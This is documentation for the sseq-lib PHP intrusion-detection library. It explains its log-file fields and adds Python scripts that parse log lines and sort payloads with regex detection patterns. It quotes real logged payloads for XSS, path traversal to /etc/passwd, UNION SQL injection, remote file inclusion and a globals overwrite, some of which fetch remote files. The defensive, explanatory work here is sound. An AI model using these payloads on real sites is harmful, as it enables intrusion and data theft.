Understanding sseq-lib log file
To understand what kind of attacks sseq-lib has blocked, take a look into the log file from time to time; you find it under "sseq-lib/seq_log/log.txt". Each blocked attack is logged there together with an explanation of why it was blocked.
! Do not open "log.txt" with your web browser! A browser would render the HTML and JavaScript payloads that have been written into the log file and could execute some of the malicious code. Open it with a plain text editor or command line tools (less, grep) instead. If sseq-lib lives below the document root, also make sure the seq_log directory is not reachable over HTTP, otherwise an attacker could read the log as well.
Each line of the log file represents an attack, or the detection of a possible attack, as triggered by the integrated, lightweight IDS (intrusion detection system).
Understanding Log data
Each log line consists of the following ten fields, separated by a comma followed by a space (", "). Note that the payload field itself may contain commas (the XSS example below does), so a naive split on every comma can yield more than ten pieces:
1. date
2. time
3. IP of attacking client
4. where the attack string was found (which superglobal)
- [_GET] : $_GET
- [HGET] : $HTTP_GET_VARS
- [_POS] : $_POST
- [HPOS] : $HTTP_POST_VARS
- [_COO] : $_COOKIE
- [HCOO] : $HTTP_COOKIE_VARS
- [_SES] : $_SESSION
- [HSES] : $HTTP_SESSION_VARS
- [_REQ] : $_REQUEST
- [_GLO] : $GLOBALS
5. explanation of what happened. If the variable name which carried the payload is known it will be named.
6. attack payload
7. HTTP method used: GET or POST
8. the script that was requested (the file the attack was aimed at)
9. User Agent of the attacking client
10. referer (empty if the client sent none)
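The following parser is an added example for this page, not code from sseq-lib. It reads the ten fields described above without splitting on every comma: the five leading fields never contain ", " and are split off from the left, the remaining five are anchored on the ", GET, /path, " separator. It assumes the method is always GET or POST and the requested file is an absolute path, as in every example on this page, and it rejects lines where a field is missing instead of silently shifting columns. The sample lines are the ones shown on this page, with the curly quote and dash the web layout introduced restored to `"` and `--`.

```python
"""Parse sseq-lib log.txt lines into their ten documented fields.

Added example, not part of sseq-lib. Assumptions: fields are separated by
", " (comma + space), the method is GET or POST and the requested file is an
absolute path, as in every example on this page.
"""
import re
from collections import Counter

FIELDS = ("date", "time", "ip", "where", "explanation",
          "payload", "method", "file", "user_agent", "referer")
WHERE_TAGS = {"[_GET]", "[HGET]", "[_POS]", "[HPOS]", "[_COO]",
              "[HCOO]", "[_SES]", "[HSES]", "[_REQ]", "[_GLO]"}
DATE_RE = re.compile(r"^\d{2}\.\d{2}\.\d{4}$")
TIME_RE = re.compile(r"^\d{2}:\d{2}:\d{2}$")
# The payload (greedy) runs up to the last ", GET, /path, " separator; the
# user agent (greedy) runs up to the final ", " before the referer.
TAIL_RE = re.compile(r"^(?P<payload>.*), (?P<method>GET|POST), (?P<file>/[^,]*), "
                     r"(?P<user_agent>.*), (?P<referer>.*)$", re.S)


def parse_log_line(line):
    """Return a dict with the ten fields, or raise ValueError.

    A bare split on "," is not enough: payloads such as
    String.fromCharCode(104,116,...) contain commas themselves, so the five
    leading fields (which never contain ", ") are split off from the left and
    the tail is anchored on the method/file separator instead.
    """
    line = line.rstrip("\r\n")
    if line.endswith(","):          # empty referer, trailing blank trimmed
        line += " "
    head = line.split(", ", 5)
    if len(head) != 6:
        raise ValueError("too few fields: %r" % line)
    date, time, ip, where, explanation, rest = head
    if not (DATE_RE.match(date) and TIME_RE.match(time)):
        raise ValueError("bad date/time, field missing?: %r" % line)
    if where not in WHERE_TAGS:
        raise ValueError("unknown location tag %r" % where)
    m = TAIL_RE.match(rest)
    if not m:
        raise ValueError("method/file separator not found: %r" % line)
    rec = dict(zip(FIELDS[:5], (date, time, ip, where, explanation)))
    rec.update(m.groupdict())
    rec["payload"] = rec["payload"].strip()
    return rec


def summarize(lines):
    """Tally records by location tag and by the check that fired.

    Returns (by_where, by_check, errors); malformed lines are collected
    rather than silently dropped.
    """
    by_where, by_check, errors = Counter(), Counter(), []
    for ln in lines:
        try:
            rec = parse_log_line(ln)
        except ValueError as exc:
            errors.append(str(exc))
            continue
        by_where[rec["where"]] += 1
        # "p: INT param not INT" -> the check name after the parameter name
        by_check[rec["explanation"].split(": ", 1)[-1]] += 1
    return by_where, by_check, errors


# The five log lines shown on this page (IPs masked there already); the
# SQL injection line is kept as printed, i.e. without its date field.
SAMPLE_LINES = [
    '12.03.2010, 06:16:42, xxx.xxx.xx.xx, [_GET], p: INT param not INT, '
    '99"><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,'
    '103,111,111,103,108,101,46,99,111,109);</script>, GET, /index.php, '
    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; '
    '.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2),',
    '29.03.2010, 22:16:38, xxx.xxx.xx.xx, [_GET], p: INT param not INT, '
    '../../../../../../../../../../../../../../../../../../../../../../../etc/passwd , '
    'GET, /index.php, DataCha0s/2.0,',
    '08:03:28, xxx.xxx.xx.xx, [_GET], page_id: INT param not INT, '
    '133 and 1=0 Union Select 0x787878756E696F6E787878--, GET, /index.php, ,',
    '23.07.2010, 04:12:41, xxx.xxx.xx.xx, [_GET], p: INT param not INT, '
    '446 //index.php?get=http://www.xxxxxxx.cn//bbs/id1.txt??, GET, /index.php, Mozilla/5.0,',
    '19.07.2010, 09:27:19, xxx.xxx.xx.xx, [_GET], p: INT param not INT, '
    '26 ///?_SERVER[DOCUMENT_ROOT]=http://www.xxxxxxx.sch.id/sk/image_galeri/'
    'a4DAc8C2___CIMG1122.jpg???, GET, /index.php, Mozilla/5.0,',
]

if __name__ == "__main__":
    by_where, by_check, errors = summarize(SAMPLE_LINES)
    print(by_where, by_check, errors, sep="\n")
```

Run against a real log with `summarize(open("sseq-lib/seq_log/log.txt").readlines())`; the error list tells you which lines did not match the documented layout, which is exactly what happens with the SQL injection example below, where the date field is absent.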
Here are some examples of blocked attacks against a WordPress installation, each with its corresponding log line.
XSS (Cross Site Scripting)
Example from log file:
12.03.2010, 06:16:42, xxx.xxx.xx.xx, [_GET], p: INT param not INT, 99"><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);</script>, GET, /index.php, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2),
So here slice by slice:
1. 12.03.2010 (explanation: date)
2. 06:16:42 (explanation: time)
3. xxx.xxx.xx.xx (explanation: IP address of the attacking client, masked here)
4. [_GET] (explanation: the attack string was found in the superglobal $_GET)
5. p: INT param not INT (explanation: the parameter "p" is declared as an integer, but the value received was not a number)
6. 99"><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);</script> (explanation: the attack payload. It closes the HTML attribute the value is reflected into with "> and then sets self.location, redirecting the visitor's browser. The target is hidden in String.fromCharCode; the character codes spell out http://google.com, a typical test payload for reflected XSS)
7. GET (explanation: the attack was performed through a GET request)
8. /index.php (explanation: the attack was aimed at this file)
9. Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2) (explanation: user agent of the client)
10. EMPTY (explanation: no referer)
Relative Path Traversal
Example from log file:
29.03.2010, 22:16:38, xxx.xxx.xx.xx, [_GET], p: INT param not INT, ../../../../../../../../../../../../../../../../../../../../../../../etc/passwd , GET, /index.php, DataCha0s/2.0,
Here the attack payload. The long run of ../ is meant to climb out of the script's directory, however deep it is, up to the filesystem root before /etc/passwd is appended:
../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
SQL Injection
Example from log file (the date field is missing in this example as recorded):
08:03:28, xxx.xxx.xx.xx, [_GET], page_id: INT param not INT, 133 and 1=0 Union Select 0x787878756E696F6E787878--, GET, /index.php, ,
Here the attack payload. The condition 1=0 empties the original result set so that only the UNION part is returned, and the hex literal 0x787878756E696F6E787878 is the MySQL encoding of the string xxxunionxxx, a marker the attacker searches for in the response to confirm the injection worked; the trailing -- comments out the rest of the original query:
133 and 1=0 Union Select 0x787878756E696F6E787878--
Code Injection
Example from log file:
23.07.2010, 04:12:41, xxx.xxx.xx.xx, [_GET], p: INT param not INT, 446 //index.php?get=http://www.xxxxxxx.cn//bbs/id1.txt??, GET, /index.php, Mozilla/5.0,
Here the attack payload. It is a remote file inclusion attempt: a URL is passed as the value of the get parameter in the hope that the script includes and executes the remote file:
446 //index.php?get=http://www.xxxxxxx.cn//bbs/id1.txt??
Globals Overwrite
Example from log file:
19.07.2010, 09:27:19, xxx.xxx.xx.xx, [_GET], p: INT param not INT, 26 ///?_SERVER[DOCUMENT_ROOT]=http://www.xxxxxxx.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg???, GET, /index.php, Mozilla/5.0,
Here the attack payload. It tries to set $_SERVER[DOCUMENT_ROOT] from the query string, so that a script which builds its include paths from that value would pull in the remote file instead of a local one:
26 ///?_SERVER[DOCUMENT_ROOT]=http://www.xxxxxxx.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg???
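All five examples above were caught by the same generic check ("INT param not INT"), so the log alone does not tell you which kind of attack you are looking at. The following script is an added example for this page, not sseq-lib code: it sorts the payload column into the five attack classes shown above with the editor's own regex heuristics (not the library's detection rules) and decodes the two obfuscation tricks seen in the examples, String.fromCharCode(...) and MySQL 0x... string literals, so the real redirect target and the injection marker become readable. The sample payloads are the ones quoted on this page.

```python
"""Triage sseq-lib payloads into the attack classes shown on this page.

Added example, not part of sseq-lib. The regexes are the editor's own
heuristics for sorting the payload column after the fact; sseq-lib itself
flagged all of these with the generic "INT param not INT" check.
"""
import re

# Order matters: the globals-overwrite payload also carries a URL, so it is
# tested before the remote-file-inclusion pattern; fromCharCode counts as XSS.
RULES = [
    ("globals overwrite",
     re.compile(r"(_SERVER|_GET|_POST|_COOKIE|_SESSION|_REQUEST|GLOBALS)\s*\[", re.I)),
    ("xss", re.compile(r"<\s*script|javascript:|\bon\w+\s*=|String\.fromCharCode", re.I)),
    ("path traversal", re.compile(r"(\.\./|\.\.\\){2,}|/etc/passwd", re.I)),
    ("sql injection",
     re.compile(r"\bunion\b.*\bselect\b|\b(and|or)\b\s+\d+\s*=\s*\d+|--\s*$", re.I | re.S)),
    ("remote file inclusion", re.compile(r"[?&]\w+=\s*(https?|ftp)://", re.I)),
]
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)", re.I)
HEX_LITERAL_RE = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)


def classify(payload):
    """Return the first matching attack class, or 'unclassified'."""
    for name, rx in RULES:
        if rx.search(payload):
            return name
    return "unclassified"


def decode_fromcharcode(payload):
    """Reveal the strings hidden in String.fromCharCode(...) calls."""
    return ["".join(chr(int(c)) for c in args.split(",") if c.strip())
            for args in FROMCHARCODE_RE.findall(payload)]


def decode_hex_literals(payload):
    """Decode MySQL-style 0x... string literals that are printable ASCII."""
    out = []
    for hexstr in HEX_LITERAL_RE.findall(payload):
        try:
            out.append(bytes.fromhex(hexstr).decode("ascii"))
        except UnicodeDecodeError:
            pass                        # binary data, not a readable marker
    return out


def triage(payload):
    """Attack class plus whatever the obfuscation layers were hiding."""
    return {"class": classify(payload),
            "decoded": decode_fromcharcode(payload) + decode_hex_literals(payload)}


# The five payloads quoted on this page, keyed by the heading they appear under.
PAYLOADS = {
    "xss": '99"><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,'
           '103,111,111,103,108,101,46,99,111,109);</script>',
    "path traversal": "../../../../../../../../../../../../../../../../../../../../../../../etc/passwd",
    "sql injection": "133 and 1=0 Union Select 0x787878756E696F6E787878--",
    "remote file inclusion": "446 //index.php?get=http://www.xxxxxxx.cn//bbs/id1.txt??",
    "globals overwrite": "26 ///?_SERVER[DOCUMENT_ROOT]=http://www.xxxxxxx.sch.id/sk/"
                         "image_galeri/a4DAc8C2___CIMG1122.jpg???",
}

if __name__ == "__main__":
    for heading, payload in PAYLOADS.items():
        print(heading, "->", triage(payload))
```

Feed the payload field of each parsed log record into triage() to get a per-class count; anything that comes back "unclassified" deserves a manual look, because the rules only cover the patterns seen in this page's examples.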